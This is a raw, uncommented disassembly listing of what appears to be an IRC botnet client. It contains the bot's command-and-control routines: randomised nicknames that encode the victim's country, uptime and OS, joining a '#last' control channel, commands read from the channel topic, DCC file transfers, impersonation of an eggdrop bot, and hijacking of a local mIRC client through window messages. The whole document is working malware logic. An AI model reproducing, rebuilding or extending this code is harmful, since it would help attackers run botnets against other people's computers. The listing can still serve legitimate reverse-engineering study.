var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: .text:00401295�p
; .text:00401662�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset aMessage ; "message "
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: .text:00403530�p
; .text:0040353D�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call ds:dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call ds:dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call ds:dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push [ebp+var_C]
call ds:dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aLast ; "#last"
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset aU_U_U_U ; "%u.%u.%u.%u"
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DC34
push 3B6h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA_0 ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DAA4
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset aNickS ; "NICK %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41ED48
push offset aLast ; "#last"
push offset aJoinSS ; "JOIN %s %s"
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41EF48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
